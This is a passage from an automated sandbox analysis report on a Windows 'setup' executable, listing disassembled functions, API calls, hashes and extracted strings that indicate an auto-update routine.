                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast$H_prolog3_
                                                                                                                          • String ID: <
                                                                                                                          • API String ID: 3339191932-4251816714
                                                                                                                          • Opcode ID: e07f4819234ab18d4590c4b44d59ae5c905f85644d53f7c71d3c95b2def5fc26
                                                                                                                          • Instruction ID: aaf232b7dc653994aea6acb847cdc6377a2cad83e21c0b8b3f597d0cd33ddac7
                                                                                                                          • Opcode Fuzzy Hash: e07f4819234ab18d4590c4b44d59ae5c905f85644d53f7c71d3c95b2def5fc26
                                                                                                                          • Instruction Fuzzy Hash: 92916F70A00214AFEB29DF65CC94FAEF7B5BF44704F18419DE95A96290EB709E84DF10
                                                                                                                          Function 00C148D7 Relevance: 19.8, APIs: 13, Instructions: 262stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _strncpy.LIBCMT ref: 00C14920
                                                                                                                          • lstrlenA.KERNEL32 ref: 00C1493E
                                                                                                                          • _strncpy.LIBCMT ref: 00C14959
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00C14982
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 00C14998
                                                                                                                          • TabbedTextOutW.USER32(?,?,?,00000000,00000000,00000001,?,?), ref: 00C149CE
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C14A0E
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,00000048), ref: 00C14AAF
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000048), ref: 00C14AC3
                                                                                                                            • Part of subcall function 00C27AB7: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?,?,?,00C14AD4,?,?,?,?,?,?,00000048), ref: 00C27ACF
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,00000048), ref: 00C14B10
                                                                                                                          • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000048), ref: 00C14B20
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,?,00000001,?), ref: 00C14B67
                                                                                                                          • GetTabbedTextExtentW.USER32(?,?,00000000,00000001,?), ref: 00C14B80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$TabbedText$Extent_strncpy$ByteCharH_prolog3_MultiWide
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 88269689-0
                                                                                                                          • Opcode ID: 7cf3b8372b030166088991706dc952a42f507fc94aca31df468a79a716b7d837
                                                                                                                          • Instruction ID: 5cea709d8560f075300ce0980ac8b230146023850cf39388ee8e3c78cd9db4ba
                                                                                                                          • Opcode Fuzzy Hash: 7cf3b8372b030166088991706dc952a42f507fc94aca31df468a79a716b7d837
                                                                                                                          • Instruction Fuzzy Hash: 7691F371D00119AFDB14EFA0DC86AEEBBB8FF59310F044169F905A7241DB709E81EBA1
                                                                                                                          Function 00C23D24 Relevance: 19.6, APIs: 13, Instructions: 125filetimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00000000,?,00000000,00C94050,000000FF), ref: 00C23D47
                                                                                                                          • GetLastError.KERNEL32(?,00000000,00C94050,000000FF), ref: 00C23D50
                                                                                                                          • GetFileTime.KERNEL32(00000000,?,00C94050,?,?,00000000,00C94050,000000FF), ref: 00C23D6F
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,?,00000000,00000000,?,00000000,00C94050,000000FF), ref: 00C23D89
                                                                                                                          • GetLastError.KERNEL32(?,00000000,00C94050,000000FF), ref: 00C23D95
                                                                                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00C94050,000000FF), ref: 00C23DA1
                                                                                                                          • SetLastError.KERNEL32(00000000,?,00000000,00C94050,000000FF), ref: 00C23DBC
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorFileLast$Create$CloseHandleTime
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1198413326-0
                                                                                                                          • Opcode ID: e0e8d7a145679d470cc417425eee28b22a7276e56c1769c012037e0cc0f64aec
                                                                                                                          • Instruction ID: 906ed66b782ac5c48594b1f31c48a56fdecc9e7c0ee222e95732573899c4fd5a
                                                                                                                          • Opcode Fuzzy Hash: e0e8d7a145679d470cc417425eee28b22a7276e56c1769c012037e0cc0f64aec
                                                                                                                          • Instruction Fuzzy Hash: FE413771A10258AFEB109FA4EC49FBE7BBCFB09711F10015AF921E6190DB74AE44DB60
                                                                                                                          Function 00C21E81 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 225filewindowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C21E8B
                                                                                                                          • GetCapture.USER32 ref: 00C21EA1
                                                                                                                          • ReleaseCapture.USER32 ref: 00C21EB1
                                                                                                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00C21F32
                                                                                                                          • DragQueryFileW.SHELL32(?,00000000,00000000,00000104), ref: 00C21FB2
                                                                                                                          • DragFinish.SHELL32(?), ref: 00C2213C
                                                                                                                          • GetParent.USER32(?), ref: 00C22145
                                                                                                                          • IsWindow.USER32(?), ref: 00C2215E
                                                                                                                          • SendMessageW.USER32(?,0000004E,00000000,?), ref: 00C2219C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Drag$CaptureFileQuery$FinishH_prolog3_MessageParentReleaseSendWindow
                                                                                                                          • String ID: .lnk$.pif
                                                                                                                          • API String ID: 1279402775-2725715280
                                                                                                                          • Opcode ID: 22cb7e3e16670a83d89567536753c817b8d0c47ec937c3d60d65ebe35a80db1d
                                                                                                                          • Instruction ID: 1621cad94d4a6ae40706ae3deb18367a7d9fc6c6b4611f6bde01851ff038d30d
                                                                                                                          • Opcode Fuzzy Hash: 22cb7e3e16670a83d89567536753c817b8d0c47ec937c3d60d65ebe35a80db1d
                                                                                                                          • Instruction Fuzzy Hash: 46918A7190022AABDF25EBA0EC9ABEDB778AF18314F1041D9E50967291DF349F84DF10
                                                                                                                          Function 00C1B38D Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 122registryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C1B394
                                                                                                                          • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 00C1B434
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C1B446
                                                                                                                          • RegSetValueExW.ADVAPI32(?,ForceIEUserAgent,00000000,00000004,?,00000004), ref: 00C1B491
                                                                                                                          • RegSetValueExW.ADVAPI32(?,GetUnstableBeta,00000000,00000004,?,00000004), ref: 00C1B4B6
                                                                                                                          • RegSetValueExW.ADVAPI32(?,ForceXPEdition,00000000,00000004,?,00000004), ref: 00C1B4DB
                                                                                                                          • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,0000006F,00000020), ref: 00C1B4F6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$Close$CreateH_prolog3
                                                                                                                          • String ID: ForceIEUserAgent$ForceXPEdition$GetUnstableBeta$Software\%s\MultiUpdate
                                                                                                                          • API String ID: 3883410401-2948741853
                                                                                                                          • Opcode ID: aabea3b6c0a7929a20fe21e4c9c0ae44762369c068b4e0135479a0c3be1d662b
                                                                                                                          • Instruction ID: 3f24b6b30555dce861d5116aa394a6bda75683131b28970b690d4c5544027284
                                                                                                                          • Opcode Fuzzy Hash: aabea3b6c0a7929a20fe21e4c9c0ae44762369c068b4e0135479a0c3be1d662b
                                                                                                                          • Instruction Fuzzy Hash: 03414071D00209AFEF10DBA4DC86FFEBBB5EF48700F14802AE611B6192DB715958EB24
                                                                                                                          Function 00C90CF4 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C909AD: CreateFileW.KERNEL32(?,00000000,?,00C90D9D,?,?,00000000,?,00C90D9D,?,0000000C), ref: 00C909CA
                                                                                                                          • GetLastError.KERNEL32 ref: 00C90E08
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C90E0F
                                                                                                                          • GetFileType.KERNEL32(00000000), ref: 00C90E1B
                                                                                                                          • GetLastError.KERNEL32 ref: 00C90E25
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C90E2E
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C90E4E
                                                                                                                          • CloseHandle.KERNEL32(00C8C05E), ref: 00C90F9B
                                                                                                                          • GetLastError.KERNEL32 ref: 00C90FCD
                                                                                                                          • __dosmaperr.LIBCMT ref: 00C90FD4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                          • String ID: H
                                                                                                                          • API String ID: 4237864984-2852464175
                                                                                                                          • Opcode ID: 3fb40af21e35daf2e81ddadf20b5e09167bb10306a4659d34c01b4f60c2d0ab9
                                                                                                                          • Instruction ID: 7b8c69c0179dc3c48ad88c1a2c3ae79d4d70d83fbc9ec5d8fa4ecdebb2c0844f
                                                                                                                          • Opcode Fuzzy Hash: 3fb40af21e35daf2e81ddadf20b5e09167bb10306a4659d34c01b4f60c2d0ab9
                                                                                                                          • Instruction Fuzzy Hash: D3A15932A141489FCF199F68DC56BBD3BA0AF46320F28025DF8559F391C7359E12EB51
                                                                                                                          Function 00C1C30D Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 157timeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C1C317
                                                                                                                            • Part of subcall function 00C32D56: __EH_prolog3_catch.LIBCMT ref: 00C32D5D
                                                                                                                          • SetTimer.USER32(?,00000064,0000015E,00000000), ref: 00C1C453
                                                                                                                            • Part of subcall function 00C1C53F: __EH_prolog3_GS.LIBCMT ref: 00C1C546
                                                                                                                            • Part of subcall function 00C1C53F: WaitForSingleObject.KERNEL32(?,000000FF,00000074,00C1C348), ref: 00C1C582
                                                                                                                            • Part of subcall function 00C1C53F: Sleep.KERNEL32(000003E8,00000074,00C1C348), ref: 00C1C58D
                                                                                                                          Strings
                                                                                                                          • Downloading : %s, xrefs: 00C1C4DB
                                                                                                                          • Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727), xrefs: 00C1C49F
                                                                                                                          • Checking if newer version exists., xrefs: 00C1C4B8
                                                                                                                          • Socket Error!, xrefs: 00C1C511
                                                                                                                          • Current installed version is %d.%d.%d.%d, xrefs: 00C1C421
                                                                                                                          • Failed! Socket Error!!, xrefs: 00C1C4F6
                                                                                                                          • Update from file : %s, xrefs: 00C1C38C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: H_prolog3_$H_prolog3_catchObjectSingleSleepTimerWait
                                                                                                                          • String ID: Checking if newer version exists.$Current installed version is %d.%d.%d.%d$Downloading : %s$Failed! Socket Error!!$Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB5; .NET CLR 1.1.4322; .NET CLR 2.0.50727)$Socket Error!$Update from file : %s
                                                                                                                          • API String ID: 2647486242-2409613667
                                                                                                                          • Opcode ID: 7e24e23759abb99b2fc07c8b4d1bc8a1ff016953e4e5f2ba450c09e09b8d3d4e
                                                                                                                          • Instruction ID: ef3244df111c03520a9812d6ac0a90b1e8bd9399d46463fee4db9c0a1db92790
                                                                                                                          • Opcode Fuzzy Hash: 7e24e23759abb99b2fc07c8b4d1bc8a1ff016953e4e5f2ba450c09e09b8d3d4e
                                                                                                                          • Instruction Fuzzy Hash: 7751F7B0640605BFDB08EB70DC96BFEB66ABF52304F044129F41567182DB756EA0FBA1
                                                                                                                          Function 00C199B4 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 157processCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 00C199BE
                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C199FE
                                                                                                                          • PathRemoveFileSpecW.SHLWAPI(?), ref: 00C19B66
                                                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,?,?,?), ref: 00C19B92
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C19BA4
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C19BAC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseFileHandle$CreateH_prolog3_ModuleNamePathProcessRemoveSpec
                                                                                                                          • String ID: /a /s /m$ /f$ /forcebeta$/c:
                                                                                                                          • API String ID: 2693857281-1701591951
                                                                                                                          • Opcode ID: b3d03d2d370a148c5368146047aa42bfa542e3c026e216d2effe2f59830f1b64
                                                                                                                          • Instruction ID: 0e11b9fb93d2e4b8cf342dde60e27a99d75dc4a45a1625afbbde438c8227e882
                                                                                                                          • Opcode Fuzzy Hash: b3d03d2d370a148c5368146047aa42bfa542e3c026e216d2effe2f59830f1b64
                                                                                                                          • Instruction Fuzzy Hash: 2F5155B280011C6EEB64AB64DC89EFE737CEF54350F144299B509A7092DE305F89DF61
                                                                                                                          Function 00C3F68B Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 86COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00C3F6AB
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Initialize
                                                                                                                          • String ID: D2D1.dll$D2D1CreateFactory$D2D1MakeRotateMatrix$DWrite.dll$DWriteCreateFactory
                                                                                                                          • API String ID: 2538663250-1403614551
                                                                                                                          • Opcode ID: b9ede360444f8ffbbc9d17e18a650c76c98fac729e87965b105c8bd5bdfe38ca
                                                                                                                          • Instruction ID: e1f0af0af2416e1a99e177592b1fdeba009bc049a92c5628ac5764ed51e95055
                                                                                                                          • Opcode Fuzzy Hash: b9ede360444f8ffbbc9d17e18a650c76c98fac729e87965b105c8bd5bdfe38ca
                                                                                                                          • Instruction Fuzzy Hash: FC21B072660705BFDB205F71EC4EB2B76A8FB41799F00493EF456C15A0EBB0E906DA20
                                                                                                                          Function 00C06086 Relevance: 16.6, APIs: 11, Instructions: 146fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,08000000,00000000), ref: 00C060E3
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,08000000,00000000), ref: 00C06115
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C06125
                                                                                                                            • Part of subcall function 00C06008: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,08000000,00000000,?,?), ref: 00C0604C
                                                                                                                            • Part of subcall function 00C06008: WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00C06066
                                                                                                                            • Part of subcall function 00C06008: CloseHandle.KERNEL32(00000000), ref: 00C06073
                                                                                                                          • SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 00C0614A
                                                                                                                          • GetLastError.KERNEL32 ref: 00C06155
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C06166
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C0616C
                                                                                                                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00C061C1
                                                                                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 00C061E2
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00C0620C
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00C06212
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$CloseHandle$Create$Write$ErrorLastPointerRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 541900661-0
                                                                                                                          • Opcode ID: c77fe5fcbed108a30ff9f0c3806f08d97bb1df9ff805034e0d827b772486a853
                                                                                                                          • Instruction ID: 962136b7112c8dbb990a01f11a8d0c7950ae944de596f9cd0afe8c0275c093c0
                                                                                                                          • Opcode Fuzzy Hash: c77fe5fcbed108a30ff9f0c3806f08d97bb1df9ff805034e0d827b772486a853
                                                                                                                          • Instruction Fuzzy Hash: 62419971604302ABD710DF28DC49B1EBBE5BF88714F200A2DF664961E2D771EA29CB91
                                                                                                                          Function 00C22351 Relevance: 16.6, APIs: 11, Instructions: 103windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00C22375
                                                                                                                          • GetFocus.USER32 ref: 00C223D0
                                                                                                                          • GetCapture.USER32 ref: 00C223E4
                                                                                                                          • SetCapture.USER32(?,00000000), ref: 00C223F7
                                                                                                                          • GetWindowRect.USER32(?,00000000), ref: 00C2241B
                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00C2242C
                                                                                                                          • ReleaseCapture.USER32 ref: 00C22436
                                                                                                                            • Part of subcall function 00C22A59: GetWindowRect.USER32(?,?), ref: 00C22A7A
                                                                                                                            • Part of subcall function 00C22A59: PtInRect.USER32(?,?,?), ref: 00C22A9B
                                                                                                                          • GetClientRect.USER32(?,?), ref: 00C2244F
                                                                                                                            • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3E9
                                                                                                                            • Part of subcall function 00C2D3DA: ClientToScreen.USER32(?,?), ref: 00C2D3F6
                                                                                                                          • PtInRect.USER32(?,?,?), ref: 00C2246C
                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00C22483
                                                                                                                          • SetCursor.USER32(00000000), ref: 00C2248A
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.4141165043.0000000000C01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.4141149517.0000000000C00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141207106.0000000000C96000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CBF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141231000.0000000000CC8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.4141280725.0000000000CC9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c00000_setup.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$Client$CaptureScreen$CursorWindow$FocusLoadRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3513268282-0
                                                                                                                          • Opcode ID: 26dd764a8d1d8b2d2236143dad9da004d1eda212bb4c806376f33c6df9dbc9a8
                                                                                                                          • Instruction ID: 78b5b3b88e5ecc1674e04d2e7bdce25b7e8afc75ab7c0bab5ccb68b3ab48978f
                                                                                                                          • Opcode Fuzzy Hash: 26dd764a8d1d8b2d2236143dad9da004d1eda212bb4c806376f33c6df9dbc9a8
                                                                                                                          • Instruction Fuzzy Hash: 17319032504315BBCB21FFB0AC49FAE77A9FF08300F01451AF966864A1DB35EA40EB56
                                                                                                                          Function 00C276AC Relevance: 16.6, APIs: 11, Instructions: 99fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00C276DC
